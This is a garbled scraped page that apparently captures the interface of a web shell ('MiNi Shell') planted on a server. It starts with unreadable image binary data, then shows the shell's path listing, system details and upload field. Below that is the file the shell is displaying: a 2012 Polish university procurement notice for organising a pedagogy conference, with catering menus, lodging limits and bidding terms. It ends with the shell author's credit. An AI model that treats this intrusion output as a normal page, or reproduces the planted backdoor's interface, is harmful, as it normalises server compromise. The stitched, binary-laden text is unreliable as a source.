JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20121115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20121115/453012-N-2012.html

<p class="kh_header"><b>Płock: Organizacja V Międzynarodowej Konferencji Naukowej pod nazwą Kształcenie pedagogów - strategie, koncepcje, idee, pod tytułem:Kształcenie i wychowanie w reformowanej szkole- pytania o jakość</b><br>
<b>Numer ogłoszenia: 453012 - 2012; data zamieszczenia: 15.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa w Płocku , Pl. Dąbrowskiego 2, 09-402 Płock, woj. mazowieckie, tel. 24 3665400, faks 24 3665421.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwszplock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja V Międzynarodowej Konferencji Naukowej pod nazwą Kształcenie pedagogów - strategie, koncepcje, idee, pod tytułem:Kształcenie i wychowanie w reformowanej szkole- pytania o jakość.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja V Międzynarodowej Konferencji Naukowej pod nazwą Kształcenie pedagogów - strategie, koncepcje, idee, pod tytułem:Kształcenie i wychowanie w reformowanej szkole- pytania o jakość.Konferencja Kształcenie pedagogów - strategie, koncepcje, idee odbędzie się w dniach 15 i 16 kwietnia ( poniedziałek, wtorek) 2013 roku. Organizatorem Konferencji jest Instytut Nauk Humanistycznych i Społecznych Państwowej Wyższej Szkoły Zawodowej w Płocku.
Zamawiający wymaga by:
-całość obiektu  ( tzn. sale konferencyjne oraz miejsce restauracyjne i noclegowe ) była usytuowana w jednym kompleksie i jednym miejscu,
-obiekt znajdował  się przy drodze głównej krajowej , odległość od siedziby Zamawiającego - Pl. Dąbrowskiego 2 - do 10 km,
-obiekt dysponował bezpłatnym parkingiem dla 40  aut,
W trakcie trwania konferencji nie może odbywać się inna impreza  zakłócająca ciszę na obiekcie.
Po stronie Wykonawcy leży zapewnienie opieki organizacyjnej nad przygotowaniem konferencji. Wykonawca jest zobowiązany do ścisłej współpracy z Zamawiającym przy obsłudze konferencji.
Wykonawca zapewni wynajem następujących sal na obrady konferencyjne:
-Sala duża - mieszcząca 100 osób w dniu 15 i 16 kwietnia od godziny 8.00 do godziny 14.00 
W sali plenarnej obrad muszą znaleźć się przynajmniej dwa mikrofony, rzutnik multimedialny,  zabezpieczone miejsce do prawidłowego odbioru tekstu i obrazu, pozwalające na właściwy przekaz przygotowanych przez referentów prezentacji.
-3 sale mieszczące przynajmniej 35 osób w dniu 15 i 16 kwietnia od godziny 13.00 do 17.00  - obrady w trzech sekcjach będą się odbywały równolegle.
Sale powinny spełniać standardy konferencyjne:
-miejsca siedzące odpowiednio do liczby uczestników - ustawienie miejsc: równolegle ułożone stoły w stosunku do stołu prezydialnego - stół prezydialny dla prelegentów nakryty tkaniną 
- miejsca siedzące dla 6 osób + zapewnienie wody gazowanej i niegazowanej wraz ze szklankami wymienianymi w zależności od zmiany prelegentów) oraz mównica - dostęp światła dziennego z możliwością zaciemnienia i zapewnienie oświetlenia sztucznego
 - sprawna klimatyzacja 
- odpowiednie walory estetyczne - bez zbędnych ozdób, np. weselnych
- możliwość umieszczenia w salach wystawy okolicznościowej związanej z historią konferencji i jej twórców
- możliwość umieszczenia publikacji i stanowisk różnych wydawnictw, w tym wydawnictwa PWSZ w Płocku
- możliwość zainstalowania materiałów konferencyjnych w postaci banerów, stojących logo i informacji dla uczestników konferencji na terenie obiektu. Szczegółowe informacje zostaną podane min. 7 dni przed konferencją
- w salach powinna być zagwarantowana odpowiednia temperatura i możliwość bieżącego wietrzenia pomieszczeń
Dla gości z Płocka  - wieszaki na ubrania wierzchnie w bezpiecznym miejscu lub osobne pomieszczenie na ubrania wierzchnie, np. bezpłatna szatnia
Catering - zasady ogólne
-Zapewnienie obsługi serwisu kawowego
- Dania serwowane w naczyniach estetycznych, porcelanowych, nie  plastikowych, sztućce metalowe z połyskiem, obrusy śnieżnobiałe
-Filiżanki do kawy i herbaty ze spodeczkami, szklanki do soku i wody mineralnej
-Serwetki w odpowiednich stonowanych  kolorach
-Dania serwowane przez kelnerów (oprócz kolacji w dniu 14. 04 2013), przygotowanie oraz sprzątanie. Śniadania, obiady i kolacje w pomieszczeniu zarezerwowanych wyłącznie dla uczestników konferencji, odrębnym od sali, w której prowadzona jest konferencja).

Catering w dniu 14. 04 2013r.
1.Kolacja dla od 15 do 25 gości - koszt kolacji na jedną osobę nie może przekroczyć 25 złotych
Dania zimne : wędliny, sery, dżem, sałatka grecka, jajo w majonezie, pieczywo, masło.
Dania ciepłe: zapiekanka makaronowa.
Kawa i herbata z dodatkami (mleko, cytryna, cukier, słodzik)

2.Goście przybywać będą  w różnym czasie - zapewnienie obsługi przyjeżdżających od godziny 17.00 do 22.30. Kolacja podawana w formie szwedzkiego stołu.

Catering w dniu 15. 04. 2013r.

1.Śniadanie dla gości nocujących z dnia 14 na 15 kwietnia i dla osób którzy zamówią noclegi na pozostałe dni (śniadanie wliczone w cenę noclegu). Wykonawca nie uwzględnia tej pozycji w cenie oferty, goście uiszczają ją we własnym zakresie.
2.Całodzienny serwis kawowy dla gości konferencji - od 70 do 90 osób:
Kawa, herbata ( min.2, 3 rodzaje), mleko do kawy, cukier i słodzik, kruche ciasteczka (4 rodzaje) i paluszki, woda mineralna podawana w dzbankach, gazowana i niegazowana.

Koszt serwisu kawowego nie większy niż 14 złotych na osobę

3.Obiad dla gości konferencji dla od 70 do 90 osób serwowany przez kelnerów
Rosół z makaronem
Karkówka w sosie śliwkowo - morelowym, kluski śląskie , marchewka juniorka
Deser - ciastko - szarlotka
Herbata - stół szwedzki
Napoje: soki, woda mineralna

Koszt obiadu na jedną osobę nie może przekroczyć 29 złotych 

4.Uroczysta kolacja dla od 70 do 90 osób
Dania ciepłe:
Zupa borowikowa z łazankami
Polędwiczki w sosie kurkowym, ziemniaki, bukiet surówek
Cielęcina w sosie, kopytka, buraczki zasmażane
Zimne przekąski:
Rolada z łososia ze szpinakiem i serkiem chrzanowym
Półmiski rozmaitości [ wędliny pieczone, sery, marynaty]
Śledzik w oleju
Tymbaliki
Pstrąg faszerowany
Sałatka z ryżu z kurczakiem
Sałatka z gyrosem
Napoje zimne i gorące:
Soki, coca-cola, fanta, woda - 1 litr  na osobę łącznie
Kawa, herbata z dodatkami - cytryna, cukier, słodzik, mleko  oraz ciasto  - 3 rodzaje - stół szwedzki

Koszt uroczystej kolacji nie może przekroczyć 80 złotych na osobę

Catering w dniu 16.04.2012 roku

1.Śniadanie dla gości hotelowych -(śniadanie wliczone w cenę noclegu). Wykonawca nie uwzględnia tej pozycji w cenie oferty, goście uiszczają ją we własnym zakresie.

2.Serwis kawowy całodzienny dla od 50 do 80 osób: 
Kawa, herbata ( min.2,3 rodzaje), mleko do kawy, cukier i słodzik, kruche ciasteczka ( 4 rodzaje) i paluszki ,woda mineralna podawana w dzbankach  gazowana, niegazowana

Koszt serwisu kawowego nie większy niż 14 złotych na osobę
3.Obiad dla gości konferencji:
 
Krem z pieczarek z groszkiem ptysiowym
Kotlet Kaladżordżia [ schab nadziewany serkiem czosnkowym] , ziemniaki zapiekane , bukiet surówek
Deser - ciastko sernik
Herbata - stół szwedzki

Koszt obiadu na jedną osobę nie może przekroczyć 29 złotych 

Wykonawca zobowiązany jest do spotkania z Zamawiającym przed realizacją usługi w celu omówienia szczegółów logistycznych.
Godziny serwowania posiłków Zamawiający uzgodni z Wykonawcą na 2 tygodnie przed konferencją.
Wykonawca w cenie oferty uwzględnia maksymalną liczbę osób wskazaną w poszczególnych punktach opisu przedmiotu zamówienia.
Przewidywana liczba gości jest maksymalna, orientacyjna  ustalona na podstawie planowanej liczby zaproszonych osób. Na etapie składania ofert służy w celu porównania ofert i wyboru najkorzystniejszej z nich. Wykonawcy nie służy roszczenie o realizację w wielkościach podanych w opisie przedmiotu zamówienia. Zamawiający zastrzega sobie prawo do zmniejszenia ilości osób. Rozliczenie za wykonane usługi  nastąpi na podstawie rzeczywistej liczby osób korzystających z usługi.
Zamawiający zobowiązuje się przekazać Wykonawcy max. do. 14 dni przed wydarzeniem szczegółową listę uczestników konferencji.
Noclegi dla gości konferencji
Wykonawca dokona w tym samym obiekcie, w którym odbywać się będzie konferencja, wstępnej rezerwacji miejsc noclegowych na  następujących warunkach:
-Noclegi w dniu 14. 04.2013r.  dla od 15 do 25 osób 
- Noclegi w dniu 15.04. 2013r.  dla od 30 do 40 osób
-Goście hotelowi w dniu 16.04.2013r. mogą korzystać z pokoi do godziny 18 -stej
-Goście - uczestnicy konferencji mogą mieć możliwość skorzystania z  noclegów również w dniu 16. 04.2013 roku
-Koszt noclegu nie może przekraczać kwoty 70 złotych od osoby  w pokoju dwuosobowym i 110 złotych w pokoju jednoosobowym  
-W kwocie noclegu zawarta jest również kwota śniadania - dla gości nocujących.
-Warunki w pokojach powinny spełniać standardy hotelowe ( pokój z telewizorem,  dostęp do internetu na terenie obiektu).
Za noclegi goście konferencji uiszczają opłatę bezpośrednio ( z pominięciem zamawiającego) na konto ośrodka hotelowego lub na miejscu konferencji. Wykonawca w wycenie swojej oferty nie uwzględnia tej pozycji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.12.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy załączyć również:
1.Formularz oferty - Załącznik Nr 1 do SIWZ
2.Pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio z załączonych dokumentów (należy jednak załączyć dokumenty, z których wynikać będzie ciągłość i prawidłowość udzielonych pełnomocnictw - odpisy z właściwego rejestru). Załączone do oferty pełnomocnictwo winno być w formie oryginału lub kopii poświadczonej notarialnie.
3.Informacje dotyczące podwykonawców - Załącznik Nr 4 do SIWZ. Jeżeli Wykonawca nie przewiduje zatrudnienia podwykonawców wpisuje nie dotyczy i załącza niewypełniony Załącznik Nr 4 do oferty. Brak załącznika będzie oznaczał, że Wykonawca wykona zamówienie własnymi siłami.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony ustalają, że Zamawiający ma prawo do zmian umowy z powodu niedających się przewidzieć w dniu zawarcia umowy okoliczności:
1)wynagrodzenia w przypadku ustawowej zmiany wysokości podatku VAT
2)terminu realizacji przedmiotu umowy ze względu na:
a)zaistnienie działań wojennych, aktów terroryzmu, rewolucji, przewrotu wojskowego lub cywilnego, wojny domowej, skażeń radioaktywnych
b)zaistnienie klęski żywiołowej jak huragany, powodzie, trzęsienie ziemi, bunty, niepokoje, strajki.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pwszplock.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Wyższa Szkoła Zawodowa w Płocku, Pl. Dąbrowskiego 2, 09-402 Płock, pok.127.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.11.2012 godzina 09:45, miejsce: Państwowa Wyższa Szkoła Zawodowa w Płocku, Pl. Dąbrowskiego 2, 09-402 Płock - Sekretariat Kanclerza, pok.202.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobami uprawnionymi do porozumiewania się z Wykonawcami są: 
-Magdalena Kalota - Sekcja Zamówień Publicznych i Umów , Plac Dąbrowskiego 2, pok.127, tel. (0-24) 366-54-00  wew. 240, 232 w godz. pracy PWSZ/w zakresie SIWZ/. 
-Liliana Tomaszewska- Instytut Nauk Humanistycznych i Społecznych, ul. Kościuszki 20, tel. 604 819 915 w godz. pracy PWSZ/ w zakresie przedmiotu zamówienia/..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com